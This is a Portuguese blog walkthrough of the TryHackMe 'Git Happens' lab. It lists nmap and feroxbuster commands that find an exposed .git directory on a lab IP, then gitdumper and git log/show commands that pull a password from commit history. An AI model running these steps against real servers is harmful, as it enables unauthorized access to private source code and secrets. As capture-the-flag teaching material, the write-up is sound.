Git Happens – THM

Hoje vamos resolver o desafio Git Happens do TryHackme, neste desafio o objetivo é explorar uma vulnerabilidade de exposição de dados sensiveis.

Bom, chega de papo, vamos para ação.

Primero vamos mapear o host para identificar possíveis pontos de entrada.

1. Primeiro vamos mapear as portas abertas no host.

sudo nmap -sSV -Pn 10.10.141.222 -T5 –open

Identificamos a porta 80 – HTTP aberta

http://10.10.141.222/

Sabendo que tem uma aplicação web rodando vamos realizar um mapeamento de arquivos e diretórios.

feroxbuster -u http://10.10.141.222/ -X .git,.env,.txt -w /usr/share/seclists/Discovery/Web-Content/big.txt

Identificamos o diretorio .git publico http://10.10.141.222/.git/

Pesquisando sobre ferramentas de enumeração para .git encontramos o projeto abaixo

https://github.com/internetwache/GitTools

Clonamos o projeto e utilizamos o Dumper

sudo ./gitdumper.sh http://10.10.141.222/.git/ /opt/gitHappens/

conseguimos efetuar o download de todos os arquivos do projeto

adicionamos o diretorio como diretorio git seguro

git config –global –add safe.directory /opt/gitHappens

usando o comando git log, conseguimos ter acesso aos logs

listando as alteracoes

git log | grep ‘commit’ | cut -d ” ” -f2 | xargs git show

git show e56eaa8e29b589976f33d76bc58a0c4dfb9315b1

analisando as alterações encontramos a senha secreta.

E aí, o que achou? deixe seu comentário e me siga nas redes sociais.

Nos vemos no próximo desafio, Até Mais……